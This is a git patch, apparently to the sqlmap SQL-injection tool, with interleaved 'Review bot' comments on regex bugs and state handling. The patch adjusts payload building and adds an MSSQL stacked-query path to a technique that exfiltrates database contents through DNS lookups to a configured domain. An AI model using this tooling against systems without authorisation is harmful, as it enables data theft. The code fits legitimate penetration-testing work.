From 2c28423cb8fd6dc6f25752c15f7bd2b062793b8f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 2 Apr 2012 14:57:15 +0000
Subject: [PATCH] minor update

---
 lib/core/agent.py         |  2 +-
 lib/core/common.py        |  3 ++-
 lib/techniques/dns/use.py | 20 ++++++++++++++++++--
 3 files changed, 21 insertions(+), 4 deletions(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 23e66495c..bbd267826 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -200,7 +200,7 @@ class Agent:
         elif any([kb.injection.suffix, suffix]):
             expression += " %s" % (kb.injection.suffix or suffix)
 
-        return expression
+        return re.sub(r"(?s);\W*;", ";", expression)
 
     def cleanupPayload(self, payload, origValue=None):
         if payload is None:
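Review bot: The new `return re.sub(r"(?s);\W*;", ";", expression)` uses `\W`, which matches any non-word character rather than just whitespace, so a quote, parenthesis or comment marker sitting between two semicolons (e.g. `;';` or `;);`) is deleted together with the duplicate `;`, silently corrupting the payload. If the goal is only to collapse the `;  ;` left by an empty prefix or suffix, `return re.sub(r";\s*;", ";", expression)` does that without touching other characters; the `(?s)` flag is also a no-op here since it only changes what `.` matches. This assumes `re` is already imported in agent.py, which the hunk does not show. The enclosing method starts before the hunk.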
diff --git a/lib/core/common.py b/lib/core/common.py
index 7c808a31c..bb5f3c44f 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1608,7 +1608,8 @@ def getSPLSnippet(dbms, name, **variables):
     checkFile(filename)
     retVal = readCachedFileContent(filename)
 
-    retVal = re.sub(r"#.+", "", retVal).strip()
+    retVal = re.sub(r"#.+", "", retVal)
+    retVal = re.sub(r"(?s);\W+", "; ", retVal).strip()
 
     for _ in variables.keys():
         retVal = re.sub(r"%%%s%%" % _, variables[_], retVal)
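Review bot: The added `re.sub(r"(?s);\W+", "; ", retVal)` replaces every run of non-word characters following a `;` with one space, so a `;` directly followed by `)`, `'`, `--` or `/*` in the snippet loses those characters (`;)` becomes `; `). Restricting the class to whitespace, `retVal = re.sub(r";\s+", "; ", retVal)`, normalizes the line breaks the change is after without eating syntax, and `(?s)` is redundant because it only affects `.`. Note also that the preceding `#.+` strip removes a `#` and the rest of its line even inside a string literal; that predates this commit, but joining the snippet onto one line makes the damage harder to spot in the resulting query. getSPLSnippet starts and ends outside the hunk.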
diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py
index 15f7956bc..4e5870f4c 100644
--- a/lib/techniques/dns/use.py
+++ b/lib/techniques/dns/use.py
@@ -13,12 +13,15 @@ import time
 from lib.core.agent import agent
 from lib.core.common import Backend
 from lib.core.common import calculateDeltaSeconds
+from lib.core.common import cleanQuery
 from lib.core.common import dataToStdout
 from lib.core.common import decodeHexValue
 from lib.core.common import extractRegexResult
 from lib.core.common import getSPLSnippet
 from lib.core.common import hashDBRetrieve
 from lib.core.common import hashDBWrite
+from lib.core.common import pushValue
+from lib.core.common import popValue
 from lib.core.common import randomInt
 from lib.core.common import randomStr
 from lib.core.common import safecharencode
@@ -29,6 +32,7 @@ from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import queries
 from lib.core.enums import DBMS
+from lib.core.enums import PAYLOAD
 from lib.core.settings import MAX_DNS_LABEL
 from lib.core.settings import PARTIAL_VALUE_MARKER
 from lib.core.unescaper import unescaper
@@ -53,6 +57,7 @@ def dnsUse(payload, expression):
 
         if output is None:
             kb.dnsMode = True
+            pushValue(kb.technique)
 
             while True:
                 count += 1
@@ -67,8 +72,18 @@ def dnsUse(payload, expression):
                 expressionRequest = getSPLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain)
                 expressionUnescaped = unescaper.unescape(expressionRequest)
 
-                forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))
-                Request.queryPage(forgedPayload, content=False, raise404=False)
+
+                if Backend.isDbms(DBMS.MSSQL):
+                    kb.technique = PAYLOAD.TECHNIQUE.STACKED
+                    expression = cleanQuery(expression)
+
+                    comment = queries[Backend.getIdentifiedDbms()].comment.query
+                    query = agent.prefixQuery("; %s" % expressionUnescaped)
+                    query = agent.suffixQuery("%s;%s" % (query, comment))
+                    forgedPayload = agent.payload(newValue=query)
+                else:
+                    forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))
+                Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)
 
                 _ = conf.dnsServer.pop(prefix, suffix)
                 if _:
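Review bot: In the new MSSQL branch `expression = cleanQuery(expression)` rebinds the function parameter inside the loop, but the forged query is built from `expressionUnescaped`, so the cleaned value is not used in this iteration; if `expressionReplaced` (computed before the hunk) derives from `expression`, the cleaning only takes effect from the second iteration on, otherwise the line is dead. Either drop it or clean `expression` once before the `while True:` loop, and move `kb.technique = PAYLOAD.TECHNIQUE.STACKED` next to the `pushValue(kb.technique)` above the loop, since neither changes between iterations. The branch also sends `agent.payload(newValue=query)` as a stacked query whenever the back-end is MSSQL, so it presumably relies on dnsUse only being reached with a stacked-query injection available — worth confirming at the call site. The extra blank line added before the `if` leaves two consecutive blank lines inside the function body. dnsUse starts before the hunk and its loop continues after it.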
@@ -81,6 +96,7 @@ def dnsUse(payload, expression):
                 else:
                     break
 
+            kb.technique = popValue()
             kb.dnsMode = False
 
         if output is not None:
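Review bot: `kb.technique = popValue()` and `kb.dnsMode = False` run only when the `while True:` loop exits through `break`; if `Request.queryPage` inside the loop raises (connection failure, Ctrl-C), the value pushed by `pushValue(kb.technique)` in the earlier hunk stays on the stack and, for MSSQL, `kb.technique` remains `PAYLOAD.TECHNIQUE.STACKED` for the rest of the run. Wrap the loop in `try:` … `finally:` and move both restore lines into the `finally` block so this global state is unwound on every exit path. dnsUse's remaining body continues outside the hunk.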